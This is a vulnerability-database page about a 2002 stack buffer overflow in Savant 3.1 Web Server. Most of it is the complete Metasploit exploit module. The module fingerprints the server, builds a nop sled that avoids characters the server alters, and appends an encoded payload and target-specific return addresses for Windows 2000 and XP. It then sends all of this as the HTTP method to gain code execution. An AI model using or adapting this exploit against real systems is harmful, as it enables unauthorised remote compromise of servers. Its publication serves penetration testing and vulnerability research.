Lucene search

Savant 3.1 Web Server Overflow

🗓️ 03 Oct 2007 12:37:17Reported by aushack <[email protected]>Type

This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Due to the limited space available for the payload in this exploit module, use of the "ord" payloads is recommended

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 10
Cvelist	CVE-2002-1120	12 Sep 200204:00	–	cvelist
Packet Storm	Savant 3.1 Web Server Overflow	26 Nov 200900:00	–	packetstorm
CVE	CVE-2002-1120	24 Sep 200204:00	–	cve
securityvulns	Foundstone Labs Advisory - Buffer Overflow in Savant Web Server	11 Sep 200200:00	–	securityvulns
NVD	CVE-2002-1120	24 Sep 200204:00	–	nvd
Exploit DB	Savant Web Server 3.1 - Remote Overflow (Metasploit)	4 Oct 201000:00	–	exploitdb
canvas	Immunity Canvas: SAVANT	24 Sep 200204:00	–	canvas
OpenVAS	WWW Too Long URL DoS Vulnerability	23 Jun 200900:00	–	openvas
OpenVAS	www too long url	23 Jun 200900:00	–	openvas
Tenable Nessus	Web Server Long URL Handling Remote Overflow DoS	22 Jun 199900:00	–	nessus

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Savant 3.1 Web Server Overflow',
      'Description' => %q{
          This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service
        supports a maximum of 10 threads (for a default install). Each exploit attempt
        generally causes a thread to die whether successful or not. Therefore, in a default
        configuration, you only have 10 chances.

        Due to the limited space available for the payload in this exploit module, use of the
        "ord" payloads is recommended.
      },
      'Author'      => [ 'aushack' ],
      'Arch'		  => [ ARCH_X86 ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2002-1120' ],
          [ 'OSVDB', '9829' ],
          [ 'BID', '5686' ],
          [ 'EDB', '787' ]
        ],
      'Privileged'  => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'	  =>
        {
          'Space'			   => 253,
          'BadChars'        => "\x00\x0a\x0d\x25",
          'StackAdjustment' => -3500,
          'Compat'          =>
            {
              'ConnectionType' => '+ws2ord',
            },
        },
      'Platform'    => ['win'],
      'Targets'     =>
        [
          # Patrick - Tested OK 2007/08/08 : w2ksp0, w2ksp4, xpsp2 en.
          [ 'Universal Savant.exe', 	    { 'Ret' => 0x00417a96 } ], # p/r Savant.exe
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x750211aa } ], # p/r ws2help.dll
          [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2ac5 } ], # p/r ws2help.dll
          [ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa36b2 } ], # p/r ws2help.dll
          [ 'Windows XP Pro SP2 - English',   { 'Ret' => 0x71ab76ed } ], # p/r ws2help.dll
        ],
      'DisclosureDate' => '2002-09-10',
      'DefaultTarget' => 0))
  end

  def check
    info = http_fingerprint  # check method
    if info and (info =~ /Savant\/3\.1/)
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
  end


  def safe_nops(count)
    # We need to find a safe nop combination.
    # Savant will change some chars in the http method type - anything before the "/".
    #
    # For example, "GET /" will remain "GET /", however
    # "\xe0 /" will be modified to "\xc0 /" ...
    # "\xfe /" will be modified to "\xde /" ...
    # "\xff /" will be modified to "\x9f /"
    # The code after the "/" - our payload - is unchanged >=)
    #
    # Savant bad_chars for the nops

    bad_nop_chars = [*(0xe0..0xff)].pack("C*")

    nopsled = make_nops(count) # make_nops includes the payload bad_chars
      bad_nop_chars.each_byte { |badbyte|
        nopsled.each_byte { |goodbyte|
        if (goodbyte == badbyte)
          return false
        end
      }
    }
    return nopsled
  end


  def exploit
    print_status("Searching for a suitable nopsled...")
    findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.
    until findnop
      findnop = safe_nops(24) # If nops are banned, generate a new batch.
    end

    print_status("Found one! Sending exploit.")
    sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V')
    res = send_request_raw(
      {
        'method'  => sploit,
        'uri'     => '/'
      }, 5)
    if (res)
      print_error('The server responded, that can\'t be good.')
    end

    handler
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

03 Oct 2007 12:17Current

0.2Low risk

Vulners AI Score0.2

CVSS27.5

EPSS0.65046